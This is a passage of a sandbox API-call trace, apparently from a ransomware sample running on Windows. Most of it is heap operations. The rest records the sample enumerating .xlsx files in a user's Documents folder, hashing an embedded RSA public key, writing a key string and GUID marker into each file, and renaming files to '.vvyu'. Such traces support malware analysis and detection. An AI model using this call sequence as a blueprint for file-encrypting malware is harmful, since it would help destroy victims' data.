0x2c4eaf8 [0186.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0186.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0186.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0186.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eac8 [0186.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0186.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eb28 [0186.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0186.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0186.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0186.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eb10 [0186.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0186.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6dc8f8 [0186.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0186.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39688 [0186.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc8f8 | out: hHeap=0x6a0000) returned 1 [0186.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6dc8f8 [0186.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb10 | out: hHeap=0x6a0000) returned 1 [0186.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0186.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0186.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0186.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0186.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0186.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0186.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eae0 [0186.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0186.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0186.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb40 | out: hHeap=0x6a0000) returned 1 [0186.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0186.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39688 | out: hHeap=0x6a0000) returned 1 [0186.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0186.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0186.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0186.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0186.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0186.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0186.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0186.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0186.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0ec50 [0186.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0186.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0186.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0186.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0186.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0186.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0186.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0186.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0186.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0186.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc8f8 | out: hHeap=0x6a0000) returned 1 [0186.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0186.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb28 | out: hHeap=0x6a0000) returned 1 [0186.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0186.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: hHeap=0x6a0000) returned 1 [0186.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eac8 | out: hHeap=0x6a0000) returned 1 [0186.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0186.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0186.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0186.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eab0 | out: hHeap=0x6a0000) returned 1 [0186.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38880 | out: hHeap=0x6a0000) returned 1 [0186.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0186.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0186.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82bc0 | out: hHeap=0x6a0000) returned 1 [0186.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0186.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0186.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0186.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0186.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0186.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0186.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0186.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0186.571] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x7817, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x7817, lpOverlapped=0x0) returned 1 [0186.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0186.573] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x781c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.573] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0186.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0186.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0186.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0186.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0186.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0186.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0186.574] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0186.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0186.575] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0186.575] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0186.575] CloseHandle (hObject=0x584) returned 1 [0186.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82bc0 [0186.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d42908 [0186.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82bc0 | out: hHeap=0x6a0000) returned 1 [0186.580] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\y_n6R.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\y_n6r.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\y_n6R.xlsx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\y_n6r.xlsx.vvyu")) returned 1 [0186.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0186.582] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0186.585] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66aa2e60, ftCreationTime.dwHighDateTime=0x1d8823b, ftLastAccessTime.dwLowDateTime=0x97244e80, ftLastAccessTime.dwHighDateTime=0x1d8a2bc, ftLastWriteTime.dwLowDateTime=0x97244e80, ftLastWriteTime.dwHighDateTime=0x1d8a2bc, nFileSizeHigh=0x0, nFileSizeLow=0x2dc9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z6ibw SvK.xlsx", cAlternateFileName="Z6IBWS~1.XLS")) returned 1 [0186.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38880 [0186.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0186.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38880 | out: hHeap=0x6a0000) returned 1 [0186.585] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\Z6ibw SvK.xlsx") returned=".xlsx" [0186.585] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Z6ibw SvK.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\z6ibw svk.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0186.586] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=11721) returned 1 [0186.586] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0186.588] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x2da3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.588] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0186.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0186.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0186.591] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0186.591] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x2dc9, lpOverlapped=0x0) returned 1 [0186.592] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0186.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0186.592] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0186.592] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0186.592] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0186.594] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0186.594] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0186.594] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0186.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0186.594] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0186.594] GetLastError () returned 0x0 [0186.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0186.594] GetLastError () returned 0x0 [0186.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0186.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0186.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0186.594] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0186.594] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0186.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0186.595] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0186.595] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0186.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0186.595] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0186.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0186.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0186.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2dd0) returned 0x2d43778 [0186.596] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0186.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0186.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0186.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0186.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0186.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0186.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38880 [0186.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eab0 [0186.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d388c8 [0186.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eac8 [0186.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eaf8 [0186.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eb28 [0186.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eae0 [0186.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0186.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0186.597] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0186.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0186.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: hHeap=0x6a0000) returned 1 [0186.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0186.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb28 | out: hHeap=0x6a0000) returned 1 [0186.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0186.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eb28 [0186.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0186.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eae0 [0186.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0186.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4eaf8 [0186.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0186.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0186.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0186.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0186.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0186.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0186.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0186.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0186.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0186.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0186.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0186.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: hHeap=0x6a0000) returned 1 [0186.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0186.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0186.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb28 | out: hHeap=0x6a0000) returned 1 [0186.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0186.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0186.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0186.600] GetCurrentThreadId () returned 0x264 [0186.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0186.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d37528 [0186.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0186.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0186.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0186.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0186.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0186.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0186.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.601] GetCurrentThreadId () returned 0x264 [0186.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0186.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.607] HeapFree (in: 